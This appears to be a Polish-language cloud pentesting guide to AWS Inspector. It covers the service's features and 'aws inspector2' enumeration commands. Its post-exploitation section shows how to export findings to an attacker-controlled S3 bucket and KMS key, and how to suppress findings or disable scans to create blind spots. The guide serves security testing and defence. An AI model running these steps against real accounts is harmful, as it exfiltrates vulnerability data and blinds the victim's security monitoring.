AWS - Inspector Enum

AWS - Inspector Enum

Inspector

Amazon Inspector to zaawansowana, zautomatyzowana usługa zarządzania podatnościami, zaprojektowana w celu zwiększenia bezpieczeństwa Twojego środowiska AWS. Usługa ta nieustannie skanuje instancje Amazon EC2, obrazy kontenerów w Amazon ECR, Amazon ECS oraz funkcje AWS Lambda w poszukiwaniu podatności i niezamierzonego narażenia sieciowego. Wykorzystując solidną bazę danych informacji o podatnościach, Amazon Inspector dostarcza szczegółowe wyniki, w tym poziomy zagrożenia i zalecenia dotyczące usunięcia, pomagając organizacjom proaktywnie identyfikować i rozwiązywać ryzyka bezpieczeństwa. To kompleksowe podejście zapewnia wzmocnioną postawę bezpieczeństwa w różnych usługach AWS, wspierając zgodność i zarządzanie ryzykiem.

Key elements

Findings

Wyniki w Amazon Inspector to szczegółowe raporty dotyczące podatności i narażeń odkrytych podczas skanowania instancji EC2, repozytoriów ECR lub funkcji Lambda. W zależności od stanu, wyniki są klasyfikowane jako:

• Aktywne: Wynik nie został usunięty.

• Zamknięte: Wynik został usunięty.

• Tłumione: Wynik został oznaczony tym stanem z powodu jednej lub więcej reguł tłumienia.

Wyniki są również klasyfikowane w trzy następujące typy:

• Pakiet: Te wyniki dotyczą podatności w pakietach oprogramowania zainstalowanych na Twoich zasobach. Przykłady obejmują przestarzałe biblioteki lub zależności z znanymi problemami bezpieczeństwa.

• Kod: Ta kategoria obejmuje podatności znalezione w kodzie aplikacji działających na Twoich zasobach AWS. Typowe problemy to błędy w kodzie lub niebezpieczne praktyki, które mogą prowadzić do naruszeń bezpieczeństwa.

• Sieć: Wyniki sieciowe identyfikują potencjalne narażenia w konfiguracjach sieciowych, które mogą być wykorzystywane przez atakujących. Obejmują one otwarte porty, niebezpieczne protokoły sieciowe i źle skonfigurowane grupy zabezpieczeń.

Filters and Suppression Rules

Filtry i reguły tłumienia w Amazon Inspector pomagają zarządzać i priorytetyzować wyniki. Filtry pozwalają na zawężenie wyników na podstawie określonych kryteriów, takich jak poziom zagrożenia lub typ zasobu. Reguły tłumienia pozwalają na tłumienie niektórych wyników, które są uważane za niskie ryzyko, zostały już złagodzone lub z jakiegokolwiek innego ważnego powodu, zapobiegając ich przeciążeniu w raportach bezpieczeństwa i pozwalając skupić się na bardziej krytycznych problemach.

Software Bill of Materials (SBOM)

Software Bill of Materials (SBOM) w Amazon Inspector to eksportowalna zagnieżdżona lista inwentarzowa szczegółowo opisująca wszystkie komponenty w pakiecie oprogramowania, w tym biblioteki i zależności. SBOM-y pomagają zapewnić przejrzystość w łańcuchu dostaw oprogramowania, umożliwiając lepsze zarządzanie podatnościami i zgodnością. Są kluczowe dla identyfikacji i łagodzenia ryzyk związanych z komponentami oprogramowania open source i stron trzecich.

Key features

Export findings

Amazon Inspector oferuje możliwość eksportu wyników do Amazon S3 Buckets, Amazon EventBridge i AWS Security Hub, co umożliwia generowanie szczegółowych raportów zidentyfikowanych podatności i narażeń do dalszej analizy lub udostępnienia w określonym terminie. Ta funkcja obsługuje różne formaty wyjściowe, takie jak CSV i JSON, co ułatwia integrację z innymi narzędziami i systemami. Funkcjonalność eksportu pozwala na dostosowanie danych zawartych w raportach, umożliwiając filtrowanie wyników na podstawie określonych kryteriów, takich jak poziom zagrożenia, typ zasobu lub zakres dat, a domyślnie obejmuje wszystkie Twoje wyniki w bieżącym regionie AWS z aktywnym statusem.

Podczas eksportowania wyników niezbędny jest klucz KMS (Key Management Service) do szyfrowania danych podczas eksportu. Klucze KMS zapewniają, że eksportowane wyniki są chronione przed nieautoryzowanym dostępem, zapewniając dodatkową warstwę bezpieczeństwa dla wrażliwych informacji o podatnościach.

Amazon EC2 instances scanning

Amazon Inspector oferuje solidne możliwości skanowania instancji Amazon EC2 w celu wykrywania podatności i problemów z bezpieczeństwem. Inspector porównuje wyodrębnione metadane z instancji EC2 z zasadami z poradników bezpieczeństwa, aby wykryć podatności pakietów i problemy z dostępnością sieci. Skanowania te mogą być przeprowadzane za pomocą metod opartych na agencie lub bez agenta, w zależności od konfiguracji ustawień trybu skanowania Twojego konta.

• Oparte na agencie: Wykorzystuje agenta AWS Systems Manager (SSM) do przeprowadzania szczegółowych skanów. Ta metoda pozwala na kompleksowe zbieranie i analizowanie danych bezpośrednio z instancji.

• Bez agenta: Oferuje lekką alternatywę, która nie wymaga instalacji agenta na instancji, tworząc migawkę EBS każdego woluminu instancji EC2, szukając podatności, a następnie ją usuwając; wykorzystując istniejącą infrastrukturę AWS do skanowania.

Tryb skanowania określa, która metoda będzie używana do przeprowadzania skanów EC2:

• Oparte na agencie: Wymaga zainstalowania agenta SSM na instancjach EC2 do głębokiej inspekcji.

• Skanowanie hybrydowe: Łączy metody oparte na agencie i bez agenta, aby maksymalizować zasięg i minimalizować wpływ na wydajność. W tych instancjach EC2, gdzie zainstalowany jest agent SSM, Inspector przeprowadzi skanowanie oparte na agencie, a dla tych, gdzie nie ma agenta SSM, skanowanie będzie przeprowadzane bez agenta.

Inną ważną cechą jest głęboka inspekcja dla instancji EC2 Linux. Ta funkcja oferuje dokładną analizę oprogramowania i konfiguracji instancji EC2 Linux, dostarczając szczegółowe oceny podatności, w tym podatności systemu operacyjnego, podatności aplikacji i błędów konfiguracyjnych, zapewniając kompleksową ocenę bezpieczeństwa. Osiąga się to poprzez inspekcję niestandardowych ścieżek i wszystkich ich podkatalogów. Domyślnie Amazon Inspector skanuje następujące, ale każde konto członkowskie może zdefiniować do 5 dodatkowych niestandardowych ścieżek, a każdy delegowany administrator do 10:

• /usr/lib

• /usr/lib64

• /usr/local/lib

• /usr/local/lib64

Amazon ECR container images scanning

Amazon Inspector zapewnia solidne możliwości skanowania obrazów kontenerów Amazon Elastic Container Registry (ECR), zapewniając, że podatności pakietów są wykrywane i zarządzane efektywnie.

• Podstawowe skanowanie: To szybkie i lekkie skanowanie, które identyfikuje znane podatności pakietów OS w obrazach kontenerów, korzystając z standardowego zestawu zasad z projektu open-source Clair. Przy tej konfiguracji skanowania Twoje repozytoria będą skanowane przy przesyłaniu lub podczas ręcznych skanów.

• Zwiększone skanowanie: Ta opcja dodaje funkcję ciągłego skanowania oprócz skanowania przy przesyłaniu. Zwiększone skanowanie zagłębia się głębiej w warstwy każdego obrazu kontenera, aby zidentyfikować podatności w pakietach OS i pakietach języków programowania z wyższą dokładnością. Analizuje zarówno obraz bazowy, jak i wszelkie dodatkowe warstwy, zapewniając kompleksowy przegląd potencjalnych problemów z bezpieczeństwem.

Amazon Lambda functions scanning

Amazon Inspector zawiera kompleksowe możliwości skanowania funkcji AWS Lambda i jej warstw, zapewniając bezpieczeństwo i integralność aplikacji bezserwerowych. Inspector oferuje dwa rodzaje skanowania dla funkcji Lambda:

• Standardowe skanowanie Lambda: Ta domyślna funkcja identyfikuje podatności oprogramowania w zależnościach pakietu aplikacji dodanych do Twojej funkcji Lambda i warstw. Na przykład, jeśli Twoja funkcja używa wersji biblioteki takiej jak python-jwt z znaną podatnością, generuje wynik.

• Skanowanie kodu Lambda: Analizuje niestandardowy kod aplikacji w poszukiwaniu problemów z bezpieczeństwem, wykrywając podatności takie jak błędy wstrzykiwania, wycieki danych, słaba kryptografia i brak szyfrowania. Zawiera fragmenty kodu podkreślające wykryte podatności, takie jak zakodowane na stałe dane uwierzytelniające. Wyniki zawierają szczegółowe sugestie dotyczące usunięcia i fragmenty kodu do naprawy problemów.

Center for Internet Security (CIS) scans

Amazon Inspector zawiera skanowania CIS, aby porównać systemy operacyjne instancji Amazon EC2 z najlepszymi praktykami zalecanymi przez Center for Internet Security (CIS). Te skanowania zapewniają, że konfiguracje są zgodne z branżowymi standardami bezpieczeństwa.

• Konfiguracja: Skanowania CIS oceniają, czy konfiguracje systemu spełniają określone zalecenia CIS Benchmark, z każdym sprawdzeniem powiązanym z identyfikatorem i tytułem sprawdzenia CIS.

• Wykonanie: Skanowania są przeprowadzane lub planowane na podstawie tagów instancji i zdefiniowanych harmonogramów.

• Wyniki: Wyniki po skanowaniu wskazują, które kontrole przeszły, zostały pominięte lub nie powiodły się, dostarczając informacji o postawie bezpieczeństwa każdej instancji.

Enumeration

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

Post Exploitation

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

Atakujący mógłby wygenerować szczegółowe raporty dotyczące luk lub list materiałów oprogramowania (SBOM) i wyeksportować je z twojego środowiska AWS. Informacje te mogą być wykorzystane do zidentyfikowania konkretnych słabości, przestarzałego oprogramowania lub niebezpiecznych zależności, co umożliwia ukierunkowane ataki.

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

Przykład poniżej pokazuje, jak wyeksportować wszystkie aktywne wyniki z Amazon Inspector do kontrolowanego przez atakującego Amazon S3 Bucket z kontrolowanym przez atakującego kluczem Amazon KMS:

1. Utwórz Amazon S3 Bucket i dołącz do niego politykę, aby był dostępny z ofiary Amazon Inspector:

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"s3:PutObject",
"s3:PutObjectAcl",
"s3:AbortMultipartUpload"
],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}

1. Utwórz klucz Amazon KMS i dołącz do niego politykę, aby mógł być używany przez Amazon Inspector ofiary:

{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}

1. Wykonaj polecenie, aby utworzyć raport ustaleń eksfiltrując go:

aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f

• Potencjalny wpływ: Generowanie i eksfiltracja szczegółowych raportów o podatnościach i oprogramowaniu, uzyskiwanie informacji na temat konkretnych podatności i słabości w zabezpieczeniach.

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

Napastnik mógłby anulować generowanie określonego raportu o podatnościach lub raportu SBOM, uniemożliwiając zespołom bezpieczeństwa otrzymywanie na czas informacji o podatnościach i materiałach oprogramowania (SBOM), opóźniając wykrywanie i usuwanie problemów z zabezpieczeniami.

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>

• Potencjalny wpływ: Zakłócenie monitorowania bezpieczeństwa i uniemożliwienie terminowego wykrywania oraz usuwania problemów z bezpieczeństwem.

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

Napastnik z tymi uprawnieniami mógłby manipulować regułami filtrowania, które określają, które podatności i problemy z bezpieczeństwem są zgłaszane lub tłumione (jeśli akcja jest ustawiona na SUPPRESS, zostanie utworzona reguła tłumienia). Może to ukryć krytyczne podatności przed administratorami bezpieczeństwa, co ułatwia wykorzystanie tych słabości bez wykrycia. Poprzez modyfikację lub usunięcie ważnych filtrów, napastnik mógłby również generować szum, zalewając system nieistotnymi wynikami, co utrudnia skuteczne monitorowanie i reakcję na bezpieczeństwo.

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>

• Potencjalny wpływ: Ukrycie lub stłumienie krytycznych luk w zabezpieczeniach, lub zalanie systemu nieistotnymi wynikami.

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

Atakujący mógłby znacząco zakłócić strukturę zarządzania bezpieczeństwem.

• Dezaktywując konto delegowanego administratora, atakujący mógłby uniemożliwić zespołowi ds. bezpieczeństwa dostęp do ustawień i raportów Amazon Inspector.

• Włączenie nieautoryzowanego konta administratora pozwoliłoby atakującemu kontrolować konfiguracje bezpieczeństwa, potencjalnie dezaktywując skany lub modyfikując ustawienia, aby ukryć złośliwe działania.

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>

• Potencjalny wpływ: Zakłócenie zarządzania bezpieczeństwem.

inspector2:AssociateMember, inspector2:DisassociateMember

Napastnik mógłby manipulować stowarzyszeniem kont członkowskich w organizacji Amazon Inspector. Poprzez stowarzyszenie nieautoryzowanych kont lub rozłączenie legalnych, napastnik mógłby kontrolować, które konta są uwzględniane w skanowaniu bezpieczeństwa i raportowaniu. Może to prowadzić do wykluczenia krytycznych kont z monitorowania bezpieczeństwa, umożliwiając napastnikowi wykorzystanie luk w tych kontach bez wykrycia.

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>

• Potencjalny wpływ: Wykluczenie kluczowych kont z skanów bezpieczeństwa, co umożliwia niewykryte wykorzystanie luk.

inspector2:Disable, (inspector2:Enable & iam:CreateServiceLinkedRole)

Napastnik z uprawnieniem inspector2:Disable mógłby wyłączyć skany bezpieczeństwa dla określonych typów zasobów (EC2, ECR, Lambda, kod Lambda) w wyznaczonych kontach, pozostawiając części środowiska AWS bez nadzoru i podatne na ataki. Dodatkowo, posiadając uprawnienia inspector2:Enable & iam:CreateServiceLinkedRole, napastnik mógłby następnie selektywnie ponownie włączyć skany, aby uniknąć wykrycia podejrzanych konfiguracji.

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]

• Potencjalny wpływ: Tworzenie martwych punktów w monitorowaniu bezpieczeństwa.

inspector2:UpdateOrganizationConfiguration

Atakujący z tym uprawnieniem mógłby zaktualizować konfiguracje dla twojej organizacji Amazon Inspector, wpływając na domyślne funkcje skanowania włączone dla nowych kont członkowskich.

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>

• Potencjalny wpływ: Zmiana polityk skanowania bezpieczeństwa i konfiguracji dla organizacji.

inspector2:TagResource, inspector2:UntagResource

Napastnik mógłby manipulować tagami na zasobach AWS Inspector, które są kluczowe dla organizowania, śledzenia i automatyzacji ocen bezpieczeństwa. Poprzez zmianę lub usunięcie tagów, napastnik mógłby potencjalnie ukryć luki w zabezpieczeniach przed skanami bezpieczeństwa, zakłócić raportowanie zgodności i ingerować w procesy automatycznej naprawy, co prowadziłoby do niekontrolowanych problemów z bezpieczeństwem i naruszenia integralności systemu.

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>

• Potencjalny wpływ: Ukrywanie luk, zakłócenie raportowania zgodności, zakłócenie automatyzacji bezpieczeństwa oraz zakłócenie alokacji kosztów.

Odniesienia

• https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html

• https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html